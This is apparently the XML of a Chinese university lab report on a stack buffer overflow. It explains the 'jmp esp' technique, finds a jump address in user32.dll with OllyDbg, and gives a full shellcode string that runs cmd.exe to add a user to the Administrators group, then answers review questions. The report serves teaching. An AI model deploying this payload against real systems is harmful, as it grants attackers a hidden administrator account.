          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的堆栈分布如下：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5203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instrText xml:space="preserve">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instrText xml:space="preserve">eq \o\ac(○,1)</w:instrTex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函数参数（s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5203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instrText xml:space="preserve">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instrText xml:space="preserve">eq \o\ac(○,2)</w:instrTex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eturn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5203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instrText xml:space="preserve">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instrText xml:space="preserve">eq \o\ac(○,3)</w:instrTex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old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8" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203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|</w:t>
            </w:r>
          </w:p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|</w:t>
            </w:r>
          </w:p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5203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5203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buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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我们将shellcode存入函数参数s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，如果设法在f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>返回后令指令指针跳转到s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的内存空间，那么s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>里的shellcode将被执行，这里使用“jmp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esp”方法实现，即函数返回地址被覆盖成指令“jmp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esp”所在的地址，当fun执行完ret指令后，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\o\ac(○,2)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出栈，esp此时指向了_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\o\ac(○,1)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__(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>此处填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\o\ac(○,1)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\o\ac(○,2)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或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\o\ac(○,3)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</w:rPr>
        <w:t>，程序的eip被改成了jmp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esp的地址，接下来便会执行此跳转指令，eip便指向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\o\ac(○,1)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处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此处填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\o\ac(○,1)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\o\ac(○,2)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或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 w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve">eq \o\ac(○,3)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</w:rPr>
        <w:t>，执行shellcode。</w:t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要成功执行shellcode，则需要一条jmp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esp的地址，这里我们通过在C程序中使用LoadLibrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(“user32.dll”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>方法加载user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，在此动态链接库中找到一条jmp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esp，具体操作如下：编译C程序，使用Ollydbg调试，令程序执行完LoadLibrary后，按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lt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+M，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>模块列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，寻找user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dll，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="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497580" cy="53340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然后右键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-在反汇编窗口查看，转到user32.dll领空。然后ctrl+f输入jmp esp回车，寻找一条jmp esp指令，指令的地址为_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77D29353</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>___，给出截图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/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0335" cy="2357755"/>
            <wp:effectExtent l="0" t="0" r="12065" b="444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因此，构造shellcode，令返回地址为jmp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esp指令的地址：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char str[10000] = "AAAAAAAAAAAAAAAAAAAAAA"\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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>\x53\x93\xD2\x77</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\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"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\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"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\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"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\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"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\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"\xfc\x01\xc7\x68\x79\x31\x41\x01\x68\x20\x6c\x69\x6c\x68\x2f"\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"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\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"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\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"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\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"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x32\x33\x34\x35\x68\x31"\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"\x41\x20\x31\x68\x6c\x69\x6c\x79\x68\x73\x65\x72\x20\x68\x65"\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"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\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"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";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0710" cy="2661285"/>
            <wp:effectExtent l="0" t="0" r="8890" b="5715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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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首先打开命令提示符，执行“net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user”观察当前系统的用户账户，然后编译修改后的C代码，运行程序，忽略出现的报错信息，令程序退出后再次执行“net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user”，可观察到多出一个用户账户_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lyli1A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>___</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，shellcode成功被执行。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7000" cy="3338195"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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8110" cy="3288665"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635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0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snapToGrid w:val="0"/>
        <w:spacing w:before="0" w:after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思考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本次实验成功执行shellcode的关键是什么？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="36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设法跳转到shellcode所在的地址，通过栈帧的变化原理令保存在栈帧底部的str的地址存入esp，并通过jmp esp指令跳转；若找不到jmp esp则需要通过其他方法找到shellcode所在的地址。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当shellcode字符串中存在\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会发生什么？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strcat连接字符串时会将\x00前面的串视为一个字符串，不会连接x00后面的串内容，结果是strcat函数执行完毕后可能不会覆盖返回地址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F69D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="139F69D7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand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1">
    <w:nsid w:val="21805705"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2180570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132A5D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45132A5D"/>
    <w:lvl w:ilvl="0" w:tentative="0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45089A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6345089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646A88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69646A88"/>
    <w:lvl w:ilvl="0" w:tentative="0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yZjU2YjIwNzFmZWYzNmNiZTE1NTEwMjcyNDg5ZTkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00550EE6"/>
    <w:rsid w:val="0000442D"/>
    <w:rsid w:val="0001586B"/>
    <w:rsid w:val="000276B0"/>
    <w:rsid w:val="0003113D"/>
    <w:rsid w:val="0003173F"/>
    <w:rsid w:val="0006056C"/>
    <w:rsid w:val="000618E9"/>
    <w:rsid w:val="00067B41"/>
    <w:rsid w:val="000801B6"/>
    <w:rsid w:val="00081D71"/>
    <w:rsid w:val="00082B6E"/>
    <w:rsid w:val="000835D2"/>
    <w:rsid w:val="00084F53"/>
    <w:rsid w:val="000A3DF1"/>
    <w:rsid w:val="000C3B18"/>
    <w:rsid w:val="000C3F52"/>
    <w:rsid w:val="000C4F40"/>
    <w:rsid w:val="000D0647"/>
    <w:rsid w:val="000D076C"/>
    <w:rsid w:val="000E3942"/>
    <w:rsid w:val="000E651B"/>
    <w:rsid w:val="000F5D3E"/>
    <w:rsid w:val="00110C4B"/>
    <w:rsid w:val="0013493E"/>
    <w:rsid w:val="00161E13"/>
    <w:rsid w:val="001C51D7"/>
    <w:rsid w:val="001C5752"/>
    <w:rsid w:val="001D2C00"/>
    <w:rsid w:val="001D477C"/>
    <w:rsid w:val="001E0F54"/>
    <w:rsid w:val="001E3616"/>
    <w:rsid w:val="001E45B2"/>
    <w:rsid w:val="00204A99"/>
    <w:rsid w:val="00217E68"/>
    <w:rsid w:val="00222988"/>
    <w:rsid w:val="00262348"/>
    <w:rsid w:val="00263DAB"/>
    <w:rsid w:val="00264964"/>
    <w:rsid w:val="002A2EC2"/>
    <w:rsid w:val="002C4087"/>
    <w:rsid w:val="002D1101"/>
    <w:rsid w:val="002D223E"/>
    <w:rsid w:val="002D2FA4"/>
    <w:rsid w:val="002E228C"/>
    <w:rsid w:val="002E7F6F"/>
    <w:rsid w:val="002F43FB"/>
    <w:rsid w:val="002F652F"/>
    <w:rsid w:val="002F74EF"/>
    <w:rsid w:val="003071B3"/>
    <w:rsid w:val="00343211"/>
    <w:rsid w:val="003757BB"/>
    <w:rsid w:val="00382818"/>
    <w:rsid w:val="003B6D21"/>
    <w:rsid w:val="003D7294"/>
    <w:rsid w:val="00406B98"/>
    <w:rsid w:val="004416BA"/>
    <w:rsid w:val="00441CC1"/>
    <w:rsid w:val="004432F0"/>
    <w:rsid w:val="0045424E"/>
    <w:rsid w:val="00485A2F"/>
    <w:rsid w:val="00487022"/>
    <w:rsid w:val="00487840"/>
    <w:rsid w:val="004A1135"/>
    <w:rsid w:val="004A3ADD"/>
    <w:rsid w:val="004B2B8E"/>
    <w:rsid w:val="004D5C84"/>
    <w:rsid w:val="004E19FE"/>
    <w:rsid w:val="004E3AB1"/>
    <w:rsid w:val="004E4B0B"/>
    <w:rsid w:val="004E5348"/>
    <w:rsid w:val="004F47A0"/>
    <w:rsid w:val="004F6FBD"/>
    <w:rsid w:val="00514306"/>
    <w:rsid w:val="00525DDB"/>
    <w:rsid w:val="00530598"/>
    <w:rsid w:val="005321CE"/>
    <w:rsid w:val="00546E3E"/>
    <w:rsid w:val="00550EE6"/>
    <w:rsid w:val="005716C0"/>
    <w:rsid w:val="00595057"/>
    <w:rsid w:val="005B775F"/>
    <w:rsid w:val="005C3B2E"/>
    <w:rsid w:val="005C5E9C"/>
    <w:rsid w:val="005F11A7"/>
    <w:rsid w:val="006108CD"/>
    <w:rsid w:val="0064392E"/>
    <w:rsid w:val="00657018"/>
    <w:rsid w:val="00672A3A"/>
    <w:rsid w:val="00674B66"/>
    <w:rsid w:val="00677A81"/>
    <w:rsid w:val="00681BB7"/>
    <w:rsid w:val="00682F9B"/>
    <w:rsid w:val="00682FF2"/>
    <w:rsid w:val="006944B1"/>
    <w:rsid w:val="006A7CBB"/>
    <w:rsid w:val="006B4C48"/>
    <w:rsid w:val="006B578F"/>
    <w:rsid w:val="006C2E2C"/>
    <w:rsid w:val="006D37CD"/>
    <w:rsid w:val="006D3C97"/>
    <w:rsid w:val="006D72DC"/>
    <w:rsid w:val="006E0B39"/>
    <w:rsid w:val="00715694"/>
    <w:rsid w:val="00720C70"/>
    <w:rsid w:val="007243EE"/>
    <w:rsid w:val="00727045"/>
    <w:rsid w:val="007428E6"/>
    <w:rsid w:val="00745252"/>
    <w:rsid w:val="007462CF"/>
    <w:rsid w:val="007639B3"/>
    <w:rsid w:val="00767C24"/>
    <w:rsid w:val="007815F1"/>
    <w:rsid w:val="00781A0D"/>
    <w:rsid w:val="00785732"/>
    <w:rsid w:val="007967E2"/>
    <w:rsid w:val="007A2316"/>
    <w:rsid w:val="007B638F"/>
    <w:rsid w:val="007E0014"/>
    <w:rsid w:val="007E7C0C"/>
    <w:rsid w:val="00805995"/>
    <w:rsid w:val="00845C4A"/>
    <w:rsid w:val="008561BE"/>
    <w:rsid w:val="008919CF"/>
    <w:rsid w:val="008A1025"/>
    <w:rsid w:val="008C13A2"/>
    <w:rsid w:val="008C5A95"/>
    <w:rsid w:val="008E66C7"/>
    <w:rsid w:val="0092045E"/>
    <w:rsid w:val="00924F63"/>
    <w:rsid w:val="00937492"/>
    <w:rsid w:val="009411C6"/>
    <w:rsid w:val="0094433C"/>
    <w:rsid w:val="00956AB0"/>
    <w:rsid w:val="00957249"/>
    <w:rsid w:val="0096414E"/>
    <w:rsid w:val="00967ABE"/>
    <w:rsid w:val="009756AA"/>
    <w:rsid w:val="00977BBA"/>
    <w:rsid w:val="00990DE2"/>
    <w:rsid w:val="009917B5"/>
    <w:rsid w:val="009A26FB"/>
    <w:rsid w:val="009A50F4"/>
    <w:rsid w:val="009A6FCF"/>
    <w:rsid w:val="009F6A7A"/>
    <w:rsid w:val="00A32DAE"/>
    <w:rsid w:val="00A44AE3"/>
    <w:rsid w:val="00A503AC"/>
    <w:rsid w:val="00A72D8D"/>
    <w:rsid w:val="00AA1AFB"/>
    <w:rsid w:val="00AB0DCB"/>
    <w:rsid w:val="00AB170C"/>
    <w:rsid w:val="00AD0E65"/>
    <w:rsid w:val="00AD7099"/>
    <w:rsid w:val="00B24552"/>
    <w:rsid w:val="00B327B5"/>
    <w:rsid w:val="00B331F1"/>
    <w:rsid w:val="00B3507B"/>
    <w:rsid w:val="00B61149"/>
    <w:rsid w:val="00B64193"/>
    <w:rsid w:val="00B70AE8"/>
    <w:rsid w:val="00BB0909"/>
    <w:rsid w:val="00BC1FA5"/>
    <w:rsid w:val="00BC2C89"/>
    <w:rsid w:val="00BD22F2"/>
    <w:rsid w:val="00BD6624"/>
    <w:rsid w:val="00BD6F3C"/>
    <w:rsid w:val="00BE4109"/>
    <w:rsid w:val="00BE5D46"/>
    <w:rsid w:val="00BF3082"/>
    <w:rsid w:val="00C31C33"/>
    <w:rsid w:val="00C32245"/>
    <w:rsid w:val="00C36052"/>
    <w:rsid w:val="00C40A91"/>
    <w:rsid w:val="00C5173E"/>
    <w:rsid w:val="00C537F5"/>
    <w:rsid w:val="00C60115"/>
    <w:rsid w:val="00C61122"/>
    <w:rsid w:val="00C649AE"/>
    <w:rsid w:val="00C67FB5"/>
    <w:rsid w:val="00C76DDC"/>
    <w:rsid w:val="00C87949"/>
    <w:rsid w:val="00C94D91"/>
    <w:rsid w:val="00CA48F2"/>
    <w:rsid w:val="00CD319B"/>
    <w:rsid w:val="00CF4C2A"/>
    <w:rsid w:val="00CF5A39"/>
    <w:rsid w:val="00D046A9"/>
    <w:rsid w:val="00D20A31"/>
    <w:rsid w:val="00D267C8"/>
    <w:rsid w:val="00D30DCA"/>
    <w:rsid w:val="00D314DC"/>
    <w:rsid w:val="00D41F81"/>
    <w:rsid w:val="00D71B43"/>
    <w:rsid w:val="00D72193"/>
    <w:rsid w:val="00DC00E1"/>
    <w:rsid w:val="00DC0E75"/>
    <w:rsid w:val="00DC4DE1"/>
    <w:rsid w:val="00DD7818"/>
    <w:rsid w:val="00DF2EF4"/>
    <w:rsid w:val="00DF5632"/>
    <w:rsid w:val="00DF59D8"/>
    <w:rsid w:val="00E04066"/>
    <w:rsid w:val="00E14C83"/>
    <w:rsid w:val="00E258F4"/>
    <w:rsid w:val="00E41D5D"/>
    <w:rsid w:val="00E662D0"/>
    <w:rsid w:val="00E73C2C"/>
    <w:rsid w:val="00E75C49"/>
    <w:rsid w:val="00E84496"/>
    <w:rsid w:val="00E85013"/>
    <w:rsid w:val="00E87CFB"/>
    <w:rsid w:val="00EB3F56"/>
    <w:rsid w:val="00ED662B"/>
    <w:rsid w:val="00EE2295"/>
    <w:rsid w:val="00EF7CF8"/>
    <w:rsid w:val="00F005FA"/>
    <w:rsid w:val="00F16016"/>
    <w:rsid w:val="00F163A2"/>
    <w:rsid w:val="00F33DD6"/>
    <w:rsid w:val="00F34325"/>
    <w:rsid w:val="00F34A11"/>
    <w:rsid w:val="00F34A2B"/>
    <w:rsid w:val="00F40CA6"/>
    <w:rsid w:val="00F4278B"/>
    <w:rsid w:val="00F47FA5"/>
    <w:rsid w:val="00F67247"/>
    <w:rsid w:val="00F7053B"/>
    <w:rsid w:val="00F85D6C"/>
    <w:rsid w:val="00F870D1"/>
    <w:rsid w:val="00FC7924"/>
    <w:rsid w:val="00FF075E"/>
    <w:rsid w:val="00FF1C79"/>
    <w:rsid w:val="00FF2D19"/>
    <w:rsid w:val="00FF67EA"/>
    <w:rsid w:val="1E5803E9"/>
    <w:rsid w:val="31FF5CD1"/>
    <w:rsid w:val="5A5B3E16"/>
    <w:rsid w:val="6F1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color w:val="000000"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1698</Words>
  <Characters>3324</Characters>
  <Lines>23</Lines>
  <Paragraphs>6</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3391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2021-11-10T02:59:00Z</dcterms:created>
  <dc:creator>jx</dc:creator>
  <cp:lastModifiedBy>ChenD7x</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-29T12:42:51Z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B22D574B8D4448FC9F78D90CAFA708C3</vt:lpwstr>
  </property>
</Properties>
</file>